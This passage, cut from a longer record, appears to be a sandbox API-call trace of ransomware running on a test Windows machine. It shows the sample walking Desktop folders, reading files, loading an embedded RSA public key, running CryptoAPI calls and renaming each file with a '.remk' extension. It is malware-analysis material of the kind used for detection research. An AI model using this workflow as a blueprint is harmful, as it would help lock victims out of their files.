hHeap=0x630000) returned 1 [0233.157] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0233.157] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0233.157] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee340 | out: hHeap=0x630000) returned 1 [0233.157] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bb660 | out: hHeap=0x630000) returned 1 [0233.158] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.158] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b6580 | out: hHeap=0x630000) returned 1 [0233.158] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0233.158] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0233.158] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0233.158] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0233.158] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0233.158] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d69f0 | out: hHeap=0x630000) returned 1 [0233.158] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0233.158] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0233.158] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0233.158] WriteFile (in: hFile=0x640, lpBuffer=0x37c2278*, nNumberOfBytesToWrite=0xa2d6, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37c2278*, lpNumberOfBytesWritten=0x3adfb14*=0xa2d6, lpOverlapped=0x0) returned 1 [0233.158] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c2278 | out: hHeap=0x630000) returned 1 [0233.158] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xa2db, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0233.158] WriteFile (in: hFile=0x640, lpBuffer=0x31a4298*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31a4298*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0233.159] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0233.159] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325dee0 [0233.159] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0233.159] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0233.159] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x37b5b70 [0233.159] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0233.159] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dee0 | out: hHeap=0x630000) returned 1 [0233.159] WriteFile (in: hFile=0x640, lpBuffer=0x37b5b70*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x37b5b70*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0233.159] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.159] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0233.159] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0233.159] CloseHandle (hObject=0x640) returned 1 [0233.160] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6951f0 [0233.160] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x37b5b70 [0233.160] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6951f0 | out: hHeap=0x630000) returned 1 [0233.160] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\74 ZPVMU\\HfHAO43nG1N.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\74 zpvmu\\hfhao43ng1n.ppt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\74 ZPVMU\\HfHAO43nG1N.ppt.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\74 zpvmu\\hfhao43ng1n.ppt.remk")) returned 1 [0233.161] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.161] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0233.161] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0233.162] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e568 | out: hHeap=0x630000) returned 1 [0233.163] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19dc1d20, ftCreationTime.dwHighDateTime=0x1d5e6e6, ftLastAccessTime.dwLowDateTime=0x8da836a0, ftLastAccessTime.dwHighDateTime=0x1d5e220, ftLastWriteTime.dwLowDateTime=0x8da836a0, ftLastWriteTime.dwHighDateTime=0x1d5e220, nFileSizeHigh=0x0, nFileSizeLow=0xa2db, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HfHAO43nG1N.ppt", cAlternateFileName="HFHAO4~1.PPT")) returned 0 [0233.163] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0233.163] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a20 | out: hHeap=0x630000) returned 1 [0233.163] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711900 | out: hHeap=0x630000) returned 1 [0233.163] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0233.163] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba600 [0233.163] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0233.163] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.163] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.163] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.163] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.163] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.163] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.163] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.163] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.163] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.163] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.163] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.163] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.163] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.163] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.164] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.164] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.164] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.164] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.164] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.164] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.164] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.164] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0233.164] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.164] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.164] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.164] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.164] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0233.164] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.164] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0233.164] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.164] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.164] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.164] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.164] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.164] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.164] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0233.164] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.164] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.164] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.165] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0233.165] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.165] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.165] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.165] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0233.165] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.165] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.165] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.165] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.165] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.165] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.165] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.165] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.165] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.165] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.165] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.165] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0233.165] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.165] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.165] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.165] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0233.165] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.165] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.165] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.166] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.166] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.166] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.166] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.166] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.166] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.166] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.166] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.166] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0233.166] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0233.166] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba6f0 | out: hHeap=0x630000) returned 1 [0233.166] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.166] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0233.166] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzVrnoY3pfgm5\\") returned="wzVrnoY3pfgm5\\" [0233.166] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0233.166] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5808 [0233.166] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="Desktop\\" [0233.166] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37bb660 [0233.166] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0233.166] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a20 [0233.166] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0233.166] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0233.166] PathFindFileNameW (pszPath="") returned="" [0233.167] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.167] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzVrnoY3pfgm5\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x489bacc0, ftCreationTime.dwHighDateTime=0x1d5e19b, ftLastAccessTime.dwLowDateTime=0x4e00a8e0, ftLastAccessTime.dwHighDateTime=0x1d5e21e, ftLastWriteTime.dwLowDateTime=0x4e00a8e0, ftLastWriteTime.dwHighDateTime=0x1d5e21e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0233.168] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x489bacc0, ftCreationTime.dwHighDateTime=0x1d5e19b, ftLastAccessTime.dwLowDateTime=0x4e00a8e0, ftLastAccessTime.dwHighDateTime=0x1d5e21e, ftLastWriteTime.dwLowDateTime=0x4e00a8e0, ftLastWriteTime.dwHighDateTime=0x1d5e21e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0233.168] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59b1b0a0, ftCreationTime.dwHighDateTime=0x1d5dce0, ftLastAccessTime.dwLowDateTime=0x7a435e30, ftLastAccessTime.dwHighDateTime=0x1d5e682, ftLastWriteTime.dwLowDateTime=0x7a435e30, ftLastWriteTime.dwHighDateTime=0x1d5e682, nFileSizeHigh=0x0, nFileSizeLow=0x18859, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="e8KJIm_.wav", cAlternateFileName="")) returned 1 [0233.168] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba6f0 [0233.168] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa6) returned 0x31a4610 [0233.168] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzVrnoY3pfgm5\\e8KJIm_.wav") returned=".wav" [0233.168] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzVrnoY3pfgm5\\e8KJIm_.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wzvrnoy3pfgm5\\e8kjim_.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0233.169] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=100441) returned 1 [0233.169] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0233.172] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x18833, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0233.172] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0233.174] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0233.174] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x18859, lpOverlapped=0x0) returned 1 [0233.176] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.176] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x325fb40 [0233.176] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.176] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0233.176] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x6951f0) returned 1 [0233.177] CryptCreateHash (in: hProv=0x6951f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0233.177] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0233.177] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0233.177] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0233.177] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0233.177] GetLastError () returned 0x0 [0233.178] CryptDestroyHash (hHash=0x31de170) returned 1 [0233.178] CryptReleaseContext (hProv=0x6951f0, dwFlags=0x0) returned 1 [0233.178] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0233.178] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0233.178] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0233.178] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0233.179] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0233.179] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0233.180] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x18859, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0233.180] WriteFile (in: hFile=0x640, lpBuffer=0x31a4298*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31a4298*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0233.180] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0233.180] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0233.180] CloseHandle (hObject=0x640) returned 1 [0233.182] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6951f0 [0233.182] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x37b5b70 [0233.182] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6951f0 | out: hHeap=0x630000) returned 1 [0233.182] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzVrnoY3pfgm5\\e8KJIm_.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wzvrnoy3pfgm5\\e8kjim_.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzVrnoY3pfgm5\\e8KJIm_.wav.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wzvrnoy3pfgm5\\e8kjim_.wav.remk")) returned 1 [0233.183] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0233.183] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0233.183] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0233.185] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4610 | out: hHeap=0x630000) returned 1 [0233.185] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x99dcb980, ftCreationTime.dwHighDateTime=0x1d5d7f0, ftLastAccessTime.dwLowDateTime=0x8fa5ec40, ftLastAccessTime.dwHighDateTime=0x1d5db9a, 